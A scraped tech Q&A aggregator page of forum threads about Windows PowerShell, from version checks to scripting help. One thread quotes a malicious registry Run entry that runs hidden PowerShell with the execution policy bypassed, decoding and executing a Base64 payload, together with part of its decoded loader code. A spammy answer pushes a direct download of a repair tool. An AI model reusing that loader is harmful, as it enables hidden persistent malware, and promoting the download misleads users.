Over 1 million tech questions and answers.

What is so special about POWERSHELL

Q: What is so special about POWERSHELL

what is windows powershell and how does it works,??
any tips and tricks about windows powershell ?

RELEVANCY SCORE 200
Preferred Solution: What is so special about POWERSHELL

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

A: What is so special about POWERSHELL

Windows PowerShell - Wikipedia, the free encyclopedia
Try and download an RSS feed with the old Command Prompt!
Run this in PowerShell:

Code:
$x=new-object xml;$x.load('http://blogs.msdn.com/powershell/rss.aspx');$x.rss.channel.item|select title -f 8
Or try and traverse the Registry.

Code:
set-location HKLM:\SOFTWARE
get-childitem

Read other 7 answers
RELEVANCY SCORE 49.2

2017-04-20 10:35:38Successfully sent task to the Device Management Gateway 2017-04-20 10:35:44 Task has been retrieved by the Agent. 2017-04-20 10:36:18 Successfully configured BootCommand to "disable". 2017-04-20 10:36:18 Successfully configured WFType to "". 2017-04-20 10:36:18 Successfully executed ConfigWriteFilter task. 2017-04-20 10:36:18 Successfully executed common task. 2017-04-20 10:36:18 Map repository to: Master Repository 2017-04-20 10:36:18 Successfully sent task to the Device Management Gateway 2017-04-20 10:37:45 Task has been retrieved by the Agent. 2017-04-20 10:37:50 Deploy files using repository Master Repository. 2017-04-20 10:37:50 Successfully downloaded RenameTC.ps1 to C:\Windows\ from /Repository/Files/ToDeploy/Make a Change Template. 2017-04-20 10:37:50 Successfully executed DeployFiles task. 2017-04-20 10:37:50 Successfully executed common task. 2017-04-20 10:37:50 Successfully sent task to the Device Management Gateway 2017-04-20 10:37:56 Task has been retrieved by the Agent. 2017-04-20 10:38:06 Execution result (below): 2017-04-20 10:38:06 C:\Windows>powershell C:\Windows\RenameTC.ps1 2017-04-20 10:38:06 C:\Windows\RenameTC.ps1 : File C:\Windows\RenameTC.ps1 cannot be loaded 2017-04-20 10:38:06 because running scripts is disabled on this system. For more information, see 2017-04-20 10:38:06 about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. 2017-04-20 10:38:06 At line:1 char:1 2017-04-20 10:38:06 + C:\Windows\RenameTC.ps... Read more

Read other answers
RELEVANCY SCORE 48

Hello everyone. I joined the forum today and hope you can help me out. On my work desktop I am running Windows 7 and I want to upgrade PowerShell version 2.0 to 4.0 as a minimum or 5.0. I've read many articles on fixing Windows PowerShell issues but my case seems to be a little different.

To begin, I have the following prerequisites on my computer:
Windows 7 SP1
.NET 4.5
Here is the list of all .NET versions on my computer:
v2.050727 2.050727.5420 SP2
v3.0 3.0.30729.5420 SP2
v3.5 3.5.30729.5420 SP1
v4
Client 4.6.01055
Full 4.6.01055
v4.0
Client 4.0.0.0

The version of PowerShell that I have access to is 2.0. When I try to install Windows Management Framework 4.0 (x64: Windows6.1-KB2819745-x64-MultiPkg.msu) I get the following message: "Update for Windows (KB2819745) is already installed on this computer." but when I look for it in "View installed updates" or "Uninstall or change a program", it doesn't show up. I've done searches for it on my computer and came up empty. Powershell does not show up in my "All Programs" list, Program Files / Program Files (86) or its Common Files, or in the local or roaming user files. The only place I see remnants of it such as the powershell.exe file is within C:\Windows\winsxs\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_7.3.7601.933_none_3989ef6dcae7e4a9 and a few other folders like it within the winsxs directory. I don't even think the version 2.0 I am a... Read more

Read other answers
RELEVANCY SCORE 48

Not sure what happened but this was double posted. Please see the other post with this title. Thank you.

Read other answers
RELEVANCY SCORE 42.4

I have two Dell Inspiron 17R 7720 laptops. My "old" one I bought direct from Dell in 2012, the "new" one, advertised as an "Inspiron 17R 7720 Special Edition",  I bought on Ebay a couple of weeks ago. I still have the original paperwork for the old one from when I purchased it from Dell and there is no mention of "Special Edition" in the paperwork. Both are identified only as "Inspiron 7720" on the label on the underside of the computer, and there are no "Special Edition" markings or labeling anywhere on the new computer.
Hardware is pretty much identical, 1TB Samsung ST1000LM024HN HDDs, 8 GB RAM, Intel HD Graphics 4000/Nvidia GeForce GT 650M Video/3D graphics, Backlit Keyboard on both. The only hardware differences are the old computer has an Intel Core i7-3610QM processor (specified by me when I ordered the computer) and a 32GB mSATA SSD while the new computer has an Intel Core i5-3210M processor and no mSATA SSD. 
So what makes the "Special Edition" so special? Is there REALLY anything different about "Special Edition" computers, or was that just some sort of marketing hype?

A:What is so special about an Inspiron 17R 7720 "Special Edition"?

The mSATA cache drive was one of the differentiators.  When that system was built, SSDs were appreciably more expensive than they are now.

Read other 2 answers
RELEVANCY SCORE 34.4

I'm looking for some assistance with creating a powershell script.

What I'm looking to do is fairly simple (at least I think it is). I want to have a script that can be placed on a network file share that will ask for admin credentials, then use those credentials to enable a service that is normally disabled, and then start that service.

I can do this with a batch file, but I have to open an elevated command prompt first, and I'd like to avoid doing that first if possible. The only way I can think of doing this is with powershell.

Any ideas?
 

A:powershell help

I haven't used powershell, so I can't offer much in the way of help there.
If you have a batch file that works, and if you don't mind giving admin permissions but don't like the faffing around starting a command prompt as admin and then navigating to the relevant file before starting it, you could simply create a shortcut to the batch file. In the properties of shortcuts, you can specify that it should automatically run as an admin.
 

Read other 4 answers
RELEVANCY SCORE 34.4

I was running a script on my 32bit OS that opened up IE and logged me onto my company's vpn.
I am now using 64bit OS and My company's vpn does not like 64bit IE. (firefox and chrome are also iffy with our vpn, IE is the only 'official one they support'). When the script runs now on my 64bit os. IE64bit version always runs. I have been unable to find anyway to force it to open IE 32 bit version. DOes anyone know of a command I can add to the script to make it ope 32bit IE? I have tried forcing the script to run the 32bit powershell but that opens up 64bit IE.

A:Powershell

Change the path to "C:\Program Files (x86)\Internet Explorer\iexplore.exe"

Read other 2 answers
RELEVANCY SCORE 34.4

I was building script in power shell and every time I run it power shell told me I have to save it. It was starting to annoy me so check the box where it says "Dont ask me again". I am regretting that now because I have inadvertently over written some code that I cant get back. dDes anyone know how to turn this feature back on.

thx
 

A:powershell ise

Tools > Options > General Settings > Script Pane Behavior > Prompt to save scripts before running them
 

Read other 1 answers
RELEVANCY SCORE 34.4

Hello, How do I find out what version of powershell I am running in windows vista home premium and then are there any guideline I can download.

Thanks

A:M/S Powershell

Hello!

Go into regedit and have a look at this key. I find this solution easier and better than the others on the internet, as it differentiates the versions for different components more/better.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine

Also have a look at these three websites:

Scripting with Windows PowerShell
Windows PowerShell Owner's Manual
Windows PowerShell Tutorial - Introduction Microsoft's new scripting language

Good luck!

Richard

Read other 5 answers
RELEVANCY SCORE 34.4

Hi all,

I'm trying to run a powershell command that will query all mailboxes for some specific text and to log it on Office 365.

The script used to work when when the environment was first setup, but i believe its stopped work now because there is too much data to look / output now.
Code:
Get-Mailbox -ResultSize unlimited |Where-Object {$_.recipienttypedetails -like "usermailbox" -and $_.name -notlike "dpandya"} | Search-Mailbox -SearchQuery ‘Body:”This document has been archived. Click this link to access the archived document”’ -TargetMailbox [email protected] -TargetFolder SearchLogs -LogOnly -LogLevel Full
When i try that now, I get the following error:
Code:
Cannot write to a closed TextWriter.
+ CategoryInfo : NotSpecified: (:) [Search-Mailbox], ObjectDisposedException
+ FullyQualifiedErrorId : System.ObjectDisposedException,Microsoft.Exchange.Management.Tasks.SearchMailbox
+ PSComputerName : podxxxxpsh.outlook.com

Is anyone able to help with the code so that rather than using "usermailbox" i can use a list of a few mailboxes, so i'll need to run the script say 5 times rather than once?

I'm afraid i don't know enough about powershell and this took me long enough to bodge together in the first place lol..

thanks
Matt
 

A:Powershell help

Anyone?
 

Read other 1 answers
RELEVANCY SCORE 34.4

I have a 64-bit laptop running Win 10 Home.

I just notice in All apps, there is an entry of PowerShell and PowerShell (x86).
I realize the former is for 64-bit and the latter is for 32-bit.

Question :
In my 64-bit laptop, when I open PowerShell, which one am I actually using ?

example : If I go ...........
Elevated command prompt > Powershell
Which one will that be ? 32 or 64 ?

Assuming I can use both, is there a circumstance that I must use the 64-bit PowerShell ?

A:PowerShell

Mad With PowerShell: 64-bit vs 32-bit PowerShell

It is pretty much the same with Visual C++, users have to have both and apps will choose needed.

Read other 1 answers
RELEVANCY SCORE 34.4

i thought windows 7 pro comes with powershell 2 installed....
when i look in sys32 folder it shows powershell 1... also when powershell is activated it is version 1.... is this correct or what is going on... system is fully updated... win 7 pro 64 bit

thanks

A:powershell 1 or 2?

It is Powershell 2 the folder name is meaningless.
Run this in Powershell:
Code:
$host.Version

Read other 2 answers
RELEVANCY SCORE 34.4

do you use and/or have any cmdlets ??

such as:




Get-counter

Get-counter -Counter "\Processor(_Total)\% Processor Time" -SampleInterval 2 -MaxSamples 10

Get-counter -Counter "\Processor(_Total)\% Processor Time" ?Continuous


Get-counter "\Processor(*)\% Processor Time" -SampleInterval 2 -MaxSamples 100 | Export-counter -Path $home\data1.blg


to stop counter thing cntrl/C

A:do you use powershell?

Hello pacinitaly Found this:

Powershell in Windows XP, Vista, and 7- list of cmdlets

A Guy

Read other 3 answers
RELEVANCY SCORE 34.4

Hi,

I was thinking of making a script for powershell, but it was harder than i thought. I'am a beginner of the beginners when it comes to powershell, so i was wondering if any of you could help me (or maybe make me one) with making one.

This is what i was thinking of(not sure if this is even possible):

When you start powershell you get this line:
"Please type the direction of which folder you want to see a acces list, then press enter"
Example: c:\myscripts <ENTER>

"Please type the folder of where you want to save the .xls file. then press enter"
Example: c:\myscripts <ENTER>

Then i want the possibility to have powerpoint saving the acces list as a excel file in the folder which has been selected.

I've been looking for scripts for the past 3 days, but unfortunately i havent found anything.

Thanks in advantage, ill just continue making failing scripts!

Paul
My English isn't that good, if i havent been clear please say so.

A:Powershell get-acl help

This is how far i've got... (translated from dutch to english) it looks a bit weird, but no idea what I have to type next.

Write-Host -ForegroundColor Red "this script lets you export a excel file with the acces list of the folder of your choice.
"
#
#gaining info.
#
$Locatiecheck = read-host -prompt "Please type the direction of which folder you want to see a acces list, then press enter. Example: c:\myscripts"
$Locatiefile = read-host -prompt "Please type the folder of where you want to save the .xls file. then press enter Example: c:\myscripts"

cd:\$Locatiecheck
Get-Acl > $Locatiefile

Read other 1 answers
RELEVANCY SCORE 34.4

My computer came with 64 bit windows 7.1 and a program calle d powershell. I would like to know if this program can run DOS with dbase application,which is a 16 bit application? I know that this application can run in XP operating system under DOS command.

Best regards,
Gulab Gidwani
 

A:Powershell

Windows 7, SP1? There is no 7.1

Powershell is a command-line utility with a lot more power than cmd.exe

I think you need to get a DOS emulator, like DOSbox
 

Read other 1 answers
RELEVANCY SCORE 34.4

I have installed latest PS CTP V2 that supports PS eventing.
But my script does not support cmdlets register-objectevent and register-psevent.It gives me an error "the term register-objectevent is not a registered cmdlet.
Do i need to include any snapins ???
Please help

Read other answers
RELEVANCY SCORE 34.4

Accessing WMI From Windows PowerShell

Guy's Scripting Ezine 110 - PowerShell and WMI

Windows, PowerShell and WMI - Unveiling Microsoft's Best Kept Secret

Windows PowerShell: The WMI Connection

PowerShell is pretty powerful on its own, but integrating it with WMI via the get-wmiobject cmdlet can make it more powerful and reduce the need for more complicated VBS code.

The get-wmiobject or gwmi (alias) cmdlet can be used to query the computer and gather any and all WMI based information. Take a look at this short command to list the logical disk information of the computer.

Get-wmiobject Win32_LogicalDisk



This can be expanded upon using the -class, -filter and -properties options available to WMI. The following will sort the list by DeviceID and DriveType.
Get-wmiobject Win32_LogicalDisk -property DeviceId,DriveType



These examples all use the Win32_LogicalDisk class, however you can use any WMI to get information on the computers hardware, operating system, installed applications, WMI service management and performance counters. If you have used WMI in your VBS scripts, you are familiar with what WMI can do, and this functionality has been brought into MSH as well. Some other examples you can run are:
Get-wmiobject Win32_BIOS - Lists BIOS Intimation



Get-wmiobject Win32_Product - Lists Installed Packages (Applications)



Get-wmiobject Win32_PageFile - Lists all PageFile Infomation



Get-wmiobject Win32_IP4RouteTable - Self Explanatory

Read other answers
RELEVANCY SCORE 34.4

hello everyone,
So I was curious as I found all these guides for powershell but in my security classes we use cmd, other then cmd predating powershell I was curious what is the difference between the two in terms of what would you use them for? Thanks for any input.

A:Powershell or cmd?

Powershell and cmd is "DOS" the Original microsoft Operating System.

History of Computers - Microsoft's First Operating System MS-DOS

Read other 10 answers
RELEVANCY SCORE 34

Hi Guys, 

I'm trying to capture packets on a specific destination port (port 25) using powershell commands, and would need some help. I have attempted two ways, but hasn't worked.

Method 1:

param([UInt16[]]$ports=25)
New-NetEventSession -Name "Capture" -CaptureMode RealtimeLocal -LocalFilePath "C:\Users\5.etl"
Add-NetEventWFPCaptureProvider -SessionName "Capture" -TCPPorts $ports
Start-NetEventSession -Name "Capture"

Method 1 Result (Error): 

Start-NetEventSession : A general error occurred that is not covered by a more specific error code.
At line:4 char:1
+ Start-NetEventSession -Name "Capture"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (MSFT_NetEventSe...EFDF64462B1D}"):root/StandardCimv2/MSFT_NetEventSession) [St 
   art-NetEventSession], CimException
    + FullyQualifiedErrorId : MI RESULT 1,Start-NetEventSession



Method 2:

param([UInt16[]]$ports=25)
New-NetEventSession -Name "Capture" -CaptureMode RealtimeLocal -LocalFilePath "C:\Users\5.etl"
Add-NetEventPacketCaptureProvider -SessionName "Capture" -IpProtocols $ports
Start-NetEventSession -Name "Capture"

Method 2 Result:

Captures all traffic and doesnt limit it to dest.port 25, and i'm not sure of the arguments that could be used for -IpProtocols



Apprec... Read more

Read other answers
RELEVANCY SCORE 34

I unticked it in windows features,
but if I type "powershell" in search box, I get two versions of it, and they both execute.
So how do I disable this thing?

While we are at it, how can I disable other exploitable processes that the standard Windows user doesn't need?

A:how to disable powershell

I disable it by Taking Ownership and removing all users from those folders. You can easily re-enable it by adding a user.

C:\Program Files (x86)\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell

I used to remove it, but some windows updates re-install it.

You definitely have to disable Windows Script Host (used for executing scripts via .JS, .JSE, .VBS, .VBE)
reg add "HKCU\Software\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d "0" /f

POC: A closer look at the Locky ransomware

Read other 0 answers
RELEVANCY SCORE 34

Is there a simple PowerShell command to shutdown Windows?

A:Shutdown via PowerShell?

Code:
get-help stop-computer -full

Read other 1 answers
RELEVANCY SCORE 34

I am trying to change and IP address on my computer with power-shell. The code i have below changes the IP but there is an auto configuration IP address that takes over and set its self to a 169.x.x.x. can anyone help me out with this?

cls
write-host "Below are all adapters names. Please enter name of adapter you want to diable."
Get-NetAdapter
write-host ""
$an = Read-Host 'Input adapter name'
Get-NetAdapter -Name $an | Remove-NetIPAddress
New-NetIPAddress ?InterfaceAlias $an ?IPAddress 192.168.100.126 ?PrefixLength 24 -DefaultGateway 192.168.100.1
 

A:powershell to change ip

Why do it through PowerShell when you can simply change it in the GUI?
 

Read other 2 answers
RELEVANCY SCORE 34

So this has been happening for a while, first I would see it pop up on my taskbar and hovering over it would show me the black window with the script for it and I figured since its a background program it shouldnt be doing this but I ignored it, then it
got bad because avast picked it up as a virus so every time it pops up avast tells me that "Powershell.exe has been put in the virus chest" Im not a tech person so I just know the basics but this is getting really annoying because it happens frequently
and it bothers my work. I am not really sure if it does anything like use my ram or anything but thankfully it doesnt seem to do any harm to my comuter since I ran multiple virus checks. I need this fixed.

Read other answers
RELEVANCY SCORE 34

Hi, I am running a logon script that elevates to run as admin. But users get the popup message every time they log in.

Is there way to add the script as trusted so once a user clicks yes it adds as a trusted script and runs every time without the UAC popup thereafter. Thanks
powershell -noprofile -command "&{ start-process powershell -ArgumentList '-noprofile -file DataBackup.ps1' -verb RunAs -WindowStyle Hidden}"
 

Read other answers
RELEVANCY SCORE 34

brand new computer - since beginning when starting it has "windows powershell has stopped working" blah, blah, blah. it puts 2 of the boxes up, I can select either debug or close in each, it shows up each time I startup the computer - hp desktop 700-055xt.

contacted hp - they've "done their thing" by tech support chat (remote too), and it still has this situation! only had this computer for a month or two. It replaced my hp envy 750-whatever, less than a year old - hard drive problem - was sent for repair twice.

this computer also is very slow, crashes, loses internet, and other problems. guess hp is getting cheap anymore....too bad.

anyway, thanks for any help here, I'm ready to get rid of this one and forget it altogether.

Read other answers
RELEVANCY SCORE 34

Reposting from the "Am I infected" section after being directed here.
 
Hello,
 
About 3 4 months ago we had an infection in our office. I wasn't there when it happened but from what I can tell someone plugged their usb stick in more than one(!!!) of the computers, and opened a bunch of files maybe. I could take a somewhat educated guess and say it was some MSOffice file with a macro in it but I could be wrong. The machines at that time had Windows 7 installed in them. I used MBAM/RogueKiller/HitmanPro to detect for viruses, came up with a bunch and cleaned them up. I sadly don't have any logs from that point of time since it seemed that everything was clean, after repeated scans with aforementioned utilities. Edit: I found a log from MBAM, which I am attaching here. I also did not install any other Antivirus solution, but upgraded to Windows 10 which came bundled with MSE.
 
Now 6 days ago I decided to install Avast on the most severely affected computer and did a scan which checked out clean. After some time generally using the computer (to see how avast impacted perf.) avast pushed a notification window saying it prevented some kind of malicious runtime. It was classified as "BV:AndroDrp [Drp]" or something along those lines. I can't say for certain because avast (in it's infinite wisdom) decided this wasn't worth logging. At all. The referenced executable (as you might imagine) was PowerShell.
 
So I kinda panicked there seeing... Read more

Read other answers
RELEVANCY SCORE 34

Hello,
 
About 3~ months ago we had an infection in our office. I wasn't there when it happened but from what I can tell someone plugged their usb stick in more than one(!!!) of the computers, and opened a bunch of files maybe. I could take a somewhat educated guess and say it was some MSOffice file with a macro in it but I could be wrong. The machines at that time had Windows 7 installed in them. I used MBAM/RogueKiller/HitmanPro to detect for viruses, came up with a bunch and cleaned them up. I sadly don't have any logs from that point of time since it seemed that everything was clean, after repeated scans with aforementioned utilities. I also did not install any other Antivirus solution, but upgraded to Windows 10 which came bundled with MSE.
 
Now 6 days ago I decided to install Avast on the most severely affected computer and did a scan which checked out clean. After some time generally using the computer (to see how avast impacted perf.) avast pushed a notification window saying it prevented some kind of malicious runtime. It was classified as "BV:AndroDrp [Drp]" or something along those lines. I can't say for certain because avast (in it's infinite wisdom) decided this wasn't worth logging. At all. The referenced executable (as you might imagine) was PowerShell.
 
So I kinda panicked there seeing as I had to look for a ghost. Then today comes and I managed to shed some light in the problem (or so it seems). An initial search didn't yield anything as far ... Read more

Read other answers
RELEVANCY SCORE 34

when i am in my linux partition,open the terminal and type the word history i am given up to the last 500 commands i typed and then by using the ! and the command number i can run. just wondering can this be done in the win7 powershell and if so how. tks

A:win7 powershell help- can this be done

figured it out. i just installed cygwin and run window programs from the terminal. works great!

Read other 2 answers
RELEVANCY SCORE 34

when I start my pc after few minutes PowerShell consume all available RAM (tried with combination of 4/8/12/16 gb)

but still get same result only have a solution that terminate the program to use the pc.
kindly revert if there ay other solution is available.

sandeep mahajan. 

Read other answers
RELEVANCY SCORE 34

I have an HP Probook 650 G1 laptop that I have installed Server 2012 R2 on so I can have a mobile imaging server using Ghost.  The problem is I can not get the LAN adapter to be seen by windows.  What I have done is turned on the wi-fi through
server management, but I need a hard wired connections for obvious reasons.
I attempted to use powershell, but as a newbie it is a bit beyond my skill level, but the only way I might be able to do this is through powershell.  I have a broadcom 802.11 2x2 wifi and bluetooth 4.0 combination adapter in the laptop. 

What comdlet do I use to find that adapter and once I do what cmdlet do I use to enable it.
Thanks,

Read other answers
RELEVANCY SCORE 34

I'm not on a domain or anything. Just a 2 PC home Lan. But since I spotted PowerShell Plus for free I thought I'd put it on. The IDE came up. But the syntax is really weird.

Anyone know of some good tutorial pages? I'm looking for real beginner stuff. Maybe stuff like get some system information or something. I don't want to go changing things until I have a clue.

A:Any PowerShell Freaks?

karlsnooks was into PowerShell but I haven't seen him for a while.

Read other 6 answers
RELEVANCY SCORE 34

Actually I found out my powershell version which is v2.0 and have some doubts about updating it.....I have microsoft web plataform installer!. would it be of any help!!! So I can see whatever I have installed and the new version 3.0 is avaiable. What about updating it??? Can any of you help me out????

A:How to update my powershell !!!

You need to download the Windows Management Framework 3.0 - Download Windows Management Framework 3.0 from Official Microsoft Download Center

This will give you Powershell 3.0

Instructions can be found here - Installing Windows PowerShell

Regards,
Jamie

Read other 1 answers
RELEVANCY SCORE 34

I unticked it in windows features,
but if I type "powershell" in search box, I get two versions of it, and they both execute.
So how do I disable this thing?

While we are at it, how can I disable other exploitable processes that the standard Windows user doesn't need?

A:how to disable powershell

I disable it by Taking Ownership and removing all users from those folders. You can easily re-enable it by adding a user.

C:\Program Files (x86)\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell

I used to remove it, but some windows updates re-install it.

You definitely have to disable Windows Script Host (used for executing scripts via .JS, .JSE, .VBS, .VBE)
reg add "HKCU\Software\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d "0" /f

POC: A closer look at the Locky ransomware

Read other answers
RELEVANCY SCORE 34

Using ElevatedCP, Windows10 always comes up with this. I need to get the PowerShell to work.

Read other answers
RELEVANCY SCORE 34

Background: I have some text files I want to copy only specific text from. Can I start and stop with certain identifiers within the file?

The files I need to split have a heading and footer with a bunch of *s. Is there any way I can look for a specific number of *s and tell the script to copy everything between the header and footer?

They're not a header and footer per se, but these *s surround the data which I actually want.

A:Powershell Script Help

I've done some thought on this and is there a way to do something like this:

$asterisk = "***************************************"

read file lines

count asterisk

while asterisk = 3

copy data to another file

when asterisk = 4

stop and go to next file

I'm fairly new to scripting. This makes logical sense in my mind, but I'm not quite sure how to run it.

Read other 1 answers
RELEVANCY SCORE 34

Hi Guys, 

I'm trying to capture packets on a specific destination port (port 25) using powershell commands, and would need some help. I have attempted two ways, but hasn't worked.

Method 1:

param([UInt16[]]$ports=25)
New-NetEventSession -Name "Capture" -CaptureMode RealtimeLocal -LocalFilePath "C:\Users\5.etl"
Add-NetEventWFPCaptureProvider -SessionName "Capture" -TCPPorts $ports
Start-NetEventSession -Name "Capture"

Method 1 Result (Error): 

Start-NetEventSession : A general error occurred that is not covered by a more specific error code.
At line:4 char:1
+ Start-NetEventSession -Name "Capture"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (MSFT_NetEventSe...EFDF64462B1D}"):root/StandardCimv2/MSFT_NetEventSession) [St 
   art-NetEventSession], CimException
    + FullyQualifiedErrorId : MI RESULT 1,Start-NetEventSession



Method 2:

param([UInt16[]]$ports=25)
New-NetEventSession -Name "Capture" -CaptureMode RealtimeLocal -LocalFilePath "C:\Users\5.etl"
Add-NetEventPacketCaptureProvider -SessionName "Capture" -IpProtocols $ports
Start-NetEventSession -Name "Capture"

Method 2 Result:

Captures all traffic and doesnt limit it to dest.port 25, and i'm not sure of the arguments that could be used for -IpProtocols



Apprec... Read more

Read other answers
RELEVANCY SCORE 34

I've been asked to investigate running some Powershell scripts over a web app, and so far have come up empty-handed. The context is user/server management, so stuff like monitoring disk quotas, resetting user profiles, changing passwords, viewing user areas.

It will be replacing a piece of proprietary software which currently does the same job, but will be custom-scripted and maintainable.

Being Linux/UNIX-centric, I've opted to try in PHP to run the scripts, however if anyone has any alternatives, I'd be more than willing to listen to them. As far as I can work out, PHP's own "exec" function will be able to call the Powershell scripts fine.

Any help appreciated.
MF
 

Read other answers
RELEVANCY SCORE 34

I was just wondering if anyone might happen to know how to uninstall windows powershell. I have looked in my add/remove programs with the Update feature on and I have no listing for it there. I have also checked under my windows directory for anything related to $ntuninstall. There is a $ntuninstall folder in that directory, but their is nothing in that folder.

I'm wondering about this because I recently tried to upgrade to Windows Vista Ultimate and it said that it couldn't install because of Powershell being on my computer and that I needed to uninstall Powershell. I'm not really sure as to what Powershell does or as to how it effects the stability of the system, but I can't find it and I'm trying to do what it says so that I can upgrade without having to do a clean install of either Vista or Windows 7.

Ideally I'd upgrade to Windows 7 but it won't let me do that without a clean install and at the moment I can't do that until I'm able to buy a larger hard drive so that I can backup information that I really need to keep on my computer. I've got over 1.5 TB of data that I need to keep, but that is spaced out among several drives and at the moment I don't have a drive that is larger than that, that I can send everything to.

That's why I'm asking.
 

Read other answers
RELEVANCY SCORE 34

My command to collect list of third party drivers.
  $Drivers = Get-ChildItem -Path C:\Windows\inf\oem*.inf | select Name
I don't see any output from that line.
I want to delete each driver by running.
  foreach ($Driver in $Drivers) {PnPutil.exe -f -d $Driver.Name}
I'm not sure why it's not showing me the output from the first command.

Read other answers
RELEVANCY SCORE 34

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts [IP]
Restart-Service WinRM

---

The above is what I need to do to get remoting going in our domain. I will need to run this on my admin computer (with all workstations I want to connect to), and run it on every workstation to be able to accept requests from my computer.

I understand I need to go to each station to set this up, but on the admin computer, is there anyway I can set up a txt file with all the workstation IPs? The alternative would be to type in each and every workstation IP and do them one by one.

Thanks
 

Read other answers
RELEVANCY SCORE 34

Hiya

The Windows PowerShell 1.0 MUI Language Pack runs only on MUI versions of Windows, in which the Windows interface can be displayed in multiple languages. It displays the Windows PowerShell 1.0 interface in Chinese Simplified, Chinese Traditional, French, German, Italian, Japanese, Korean, Portuguese, Russian, and Spanish. For detailed information, see Knowledge Base Article 926141.

The MUI Language Pack does not include the Windows PowerShell 1.0 program. If you are running a MUI version of Windows, first install an English-language version of Windows PowerShell 1.0 and then install the MUI Language Pack for Windows PowerShell 1.0. For information about the installation packages for the English-language versions of Windows PowerShell 1.0, see Knowledge Base article 926139.

Each version of Windows PowerShell 1.0 is associated with its own version-specific MUI language pack. The MUI interface works properly only when you have installed the same versions of the Windows PowerShell program and the MUI language pack. If you have any other versions of Windows PowerShell 1.0 on the computer, uninstall the MUI language pack and the other version of Windows PowerShell 1.0 before installing the new version and the new MUI language pack. For details, see Knowledge Base Article 926141.

You do not have to restart Windows after installing the MUI Language Pack for Windows PowerShell 1.0.

Supported Operating Systems: Windows XP Service Pack 2
Requires .NET Framework Version 2.0
... Read more

A:Windows PowerShell for XP

same as above, but English:

http://www.microsoft.com/downloads/...0d-8f1d-4b97-a397-47bcc8ba3806&DisplayLang=en

eddie
 

Read other 1 answers
RELEVANCY SCORE 34

my pc always starts two programs of powershell. so i download ccleaner to manage my startup and found out that the powershell executes a command that comes from registrar.
 
On HKCU->Software->Microsoft->Windows->CurrentVersion->Run contains the startup of the two programs of powershell and this is its value:
 
:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\sKbqjiiaaaiH').ladIfOP)));
 
And the other one is
 
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ibkgMBHuJBgj').RKRSLD)));
 
The converted value of ".......Classes\sKbqjiiaaaiH.ladIfOP" is
 
$ABDDBCCQQENJQ = 'sKbqjiiaaaiH'; 
$SSYGVVHDBBGBG = '{8F560C93-E9E6-41B5-BE29-B1D61DC62A3B}';
$JIFEEHSXXFNEVL = '{955E6499-7B98-4844-A9D4-801D26DFE53D}';
Function TLTXVRUBUZYMPQAE{
Param([Parameter( Position = 0, Mandatory = $true )][Byte[]]$QpqBFfDaEIhGIli,[Parameter(Position = 1, Mandatory = $true)][Byte[]]$VLXDVISDSO)
[Byte[]]$k = New-Object Byte[] 256;
[Byte[]]$s = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){
$s[$i] = [Byte]$i;
$k[$i] = $VLXDVISDSO[$i % $VLXDVISDSO.Length];
}
$p = 0;
for ($i = 0; $i -lt 256; $i++){
$p = ($p + $s[$i] + $k[$i]) % 256;
$s[$i... Read more

A:Powershell Virus?

additional information...
I was able to delete it using ccleaner plus i still dont know if its a virus or not, so i prepared a backup of the registry.
and also if it is a virus should i delete the folder "HKCU:\Software\Classes\sKbqjiiaaaiH" and "HKCU:\Software\Classes\ibkgMBHuJBgj" which contains the code. or should i just delete the key "ladIfOP" and "RKRSLD" or just make its value to ""?

Read other 3 answers
RELEVANCY SCORE 34

** I couldn't find the correct board that fits my problem** Hello guys.I'm trying the cmdlets of iLO for PowerShell, so far and after a while I'm not able to run the simple line:Set-HPiLOHostPower -Server $srvILO -Username $username -Password $password -HostPower "No"orSet-HPiLOVirtualPowerButton -Server $srvILO -Username $username -Password $password ?PressType PressFor both lines above, nothing happens! After experiencing these issues, I tried manually clicking on "Momentary Press" button (Graceful Power Off) on iLO page, and nothing happend also!!The strange part is that if the server is already down, the command below work fine (change parameter from "No" to "Yes):Set-HPiLOHostPower -Server $srvILO -Username $username -Password $password -HostPower "Yes" The BIOS option below, is currently enabled:BIOS -> Server Availability -> Power Button.The tests has been made on different servers, DL385p G7 and G8. I'm currently with the latest iLO firmware version.I'm running out of ideas. Thank you very much,Rafael

A:iLO cmdlets for PowerShell - Help please

This is the wrong company for Servers, Storage, Software, and Networking. Please use the Hewlett Packard Enterprise Community:http://community.hpe.com/http://community.hpe.com/t5/ProLiant-Servers-ML-DL-SL/bd-p/itrc-264

Read other 1 answers
RELEVANCY SCORE 34

Hey guys,
 
Is there a way to use powershell to scan with adwarecleaner?
 
Like malwarebytes and CCleaner. It is possible to give powershell a command and then your scan will start. 

